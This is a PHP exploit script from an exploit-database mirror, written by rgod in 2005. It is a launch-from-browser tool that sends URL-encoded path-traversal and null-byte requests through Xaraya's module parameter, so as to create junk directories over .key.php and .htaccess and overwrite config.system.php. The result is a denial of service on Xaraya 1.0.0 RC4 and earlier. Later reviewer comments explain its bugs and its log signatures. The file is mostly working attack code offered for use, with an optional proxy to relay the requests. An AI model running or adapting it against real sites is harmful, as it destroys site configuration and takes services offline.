
/platforms/php/webapps/1345.php

https://github.com/B-Rich/exploit-database
  1. <?php
  2. # ---Xaraya_DOS.php 17.30 28/11/2005 #
  3. # #
  4. # Xaraya <=1.0.0 RC4 D.O.S #
  5. # coded by rgod #
  6. # site: http://rgod.altervista.org #
  7. # #
  8. # usage: launch from Apache, fill in requested fields, then go! #
  9. # #
  10. # Sun-Tzu: "Hold out baits to entice the enemy. Feign disorder, #
  11. # and crush him." #
  12. error_reporting(0);
  13. ini_set("max_execution_time",0);
  14. ini_set("default_socket_timeout", 2);
  15. ob_implicit_flush (1);
// The input form: host, path, optional port and optional proxy, all read back
// from $_POST further down. NOTE(review): `$SERVER[PHP_SELF]` is not
// `$_SERVER['PHP_SELF']`; `$SERVER` is an undefined variable, so with
// error_reporting(0) the form action silently becomes "" and the form posts
// back to the current URL. strip_tags() on it is the only output escaping here.
echo'<html><head><title> ******** Xaraya <=1.0.0 rc4 Denial of Service *********
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
********** Xaraya <=1.0.0 rc4 Denial of Service ******** </p><p class="Stile6">a
script by rgod at <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
name="form1" method="post" action="'.strip_tags($SERVER[PHP_SELF]).'"><p><input
type="text" name="host"> <span class="Stile5">* hostname (ex:www.sitename.com)
</span></p> <p><input type="text" name="path"> <span class="Stile5">* path (ex:
/xaraya/ or just / ) </span></p></p><p> <input type="text" name="port"> <span
class="Stile5">specify a port other than 80 ( default value ) </span> </p>
<p> <input type="text" name="proxy"><span class="Stile5"> send exploit
through an HTTP proxy (ip:port)</span></p><p><input type="submit" name="Submit"
value="go!"></p></form> </td></tr></table></body></html>';
  47. function show($headeri)
  48. {
  49. $ii=0;
  50. $ji=0;
  51. $ki=0;
  52. $ci=0;
  53. echo '<table border="0"><tr>';
  54. while ($ii <= strlen($headeri)-1)
  55. {
  56. $datai=dechex(ord($headeri[$ii]));
  57. if ($ji==16) {
  58. $ji=0;
  59. $ci++;
  60. echo "<td>&nbsp;&nbsp;</td>";
  61. for ($li=0; $li<=15; $li++)
  62. { echo "<td>".$headeri[$li+$ki]."</td>";
  63. }
  64. $ki=$ki+16;
  65. echo "</tr><tr>";
  66. }
  67. if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
  68. {echo "<td>".$datai."</td> ";}
  69. $ii++;
  70. $ji++;
  71. }
  72. for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
  73. { echo "<td>&nbsp&nbsp</td>";
  74. }
  75. for ($li=$ci*16; $li<=strlen($headeri); $li++)
  76. { echo "<td>".$headeri[$li]."</td>";
  77. }
  78. echo "</tr></table>";
  79. }
// Accepted proxy shape: dotted-quad IPv4, a colon, then 1-5 digits. The pattern
// has no slash delimiters; PHP treats the surrounding "(" ")" as bracket-style
// delimiters, so the whole expression is the pattern. This checks shape only,
// not octet or port ranges.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
/**
 * Send the global $packet over a raw TCP socket (sockets extension) and echo
 * the HTML-escaped response. Dead code on this page: the request loop below
 * calls sendpacketii() instead.
 *
 * Reads $proxy, $host, $port, $packet and $proxy_regex from globals; sets the
 * global $html to the response text.
 *
 * NOTE(review): the proxy regex is checked before the `$proxy==''` branch, so
 * with no proxy configured the empty string fails the match and the function
 * dies at 'Not a valid prozy...'. socket_create() returns false (not a
 * negative number) on failure and socket_connect() returns a bool, so neither
 * `< 0` comparison ever detects an error.
 */
function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
//next function to send packets
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{ $c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{
// Proxy is "ip:port" (shape enforced by $proxy_regex above).
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
// Read until socket_read() returns false/"" (peer closed or error).
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}
/**
 * Send one raw HTTP request over a fresh fsockopen() connection and echo the
 * HTML-escaped response. Needs no sockets extension; this is the sender the
 * request loop below actually uses.
 *
 * Reads $proxy, $host, $port and $proxy_regex from globals and leaves the full
 * response text in the global $html, which the caller inspects afterwards.
 *
 * @param string $packet complete request bytes, headers included
 */
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) { echo 'No response from '.htmlentities($host);
die; }
}
else
{
// Only the proxy path is validated against $proxy_regex (shape check only).
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
// Direct connection: read line by line until the peer closes.
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
// Proxy connection: read one byte at a time. The loop ends only once BOTH
// EOF is reached AND a blank line (CRLF CRLF, end of headers) has been seen;
// if the proxy closes before sending one, fread() keeps returning an empty
// string and this never terminates. eregi() was removed in PHP 7.0, so on
// PHP >= 7 this branch fails with an undefined-function error.
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
// Response is escaped before being echoed back into the page.
echo nl2br(htmlentities($html));
}
// Read the form fields. NOTE(review): bare-word keys (`$_POST[host]`) are
// undefined constants; PHP < 8 coerces them to the string 'host' with a notice
// (hidden by error_reporting(0)), PHP 8 throws an Error here.
$host=$_POST[host];$path=$_POST[path];
$port=$_POST[port];$proxy=$_POST[proxy];
if (($host<>'') and ($path<>''))
{
// Port: numeric, default 80. intval() yields 0 for blank or non-numeric
// input; `0 == ''` is true on PHP < 8 (default applies) but false on PHP 8.
$port=intval(trim($port));
if ($port=='') {$port=80;}
// The path must start and end with '/'.
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
// Through a proxy the request line carries an absolute URL, otherwise the path.
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
// Strip CRLF from host and path so they cannot add header lines to the request
// built below (only the exact "\r\n" pair is removed; bare "\n" is not).
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);
// Crafted `module=` values (see the original comments): URL-encoded
// path-traversal strings, the third carrying a NUL byte. In access logs this
// traffic stands out by a `module=` parameter containing encoded "../"
// sequences and "%00", plus the fixed User-Agent set below.
$KEYFILE=urlencode("../../../../.key.php"); //to create an empty key.php dir...
$HTACCESS=urlencode("../../../../../.htaccess"); //to create an empty .htaccess dir...
$CONFIGFILE=urlencode("../../../../config.system.php".CHR(0x00)); //overwrite configuration file with garbage
$request[0]="index.php?module=".$KEYFILE;
$request[1]="index.php?module=".$HTACCESS;
$request[2]="index.php?module=".$CONFIGFILE;
$request[3]="index.php";
// Send the requests in order. show() renders each raw request as a hex dump;
// sendpacketii() delivers it and leaves the response in the global $html.
for($i=0; $i<=count($request)-1; $i++)
{
$packet="GET ".$p.$request[$i]." HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Zoo Tycoon 2 Client\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
}
// Only the last response (plain index.php) is inspected. eregi() was removed
// in PHP 7.0, so this check fails with an undefined-function error on PHP >= 7.
if (eregi('fatal error',$html)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
}
else
{echo "Fill * required fields, optionally specify a proxy";}
  195. ?>
  196. # milw0rm.com [2005-11-29]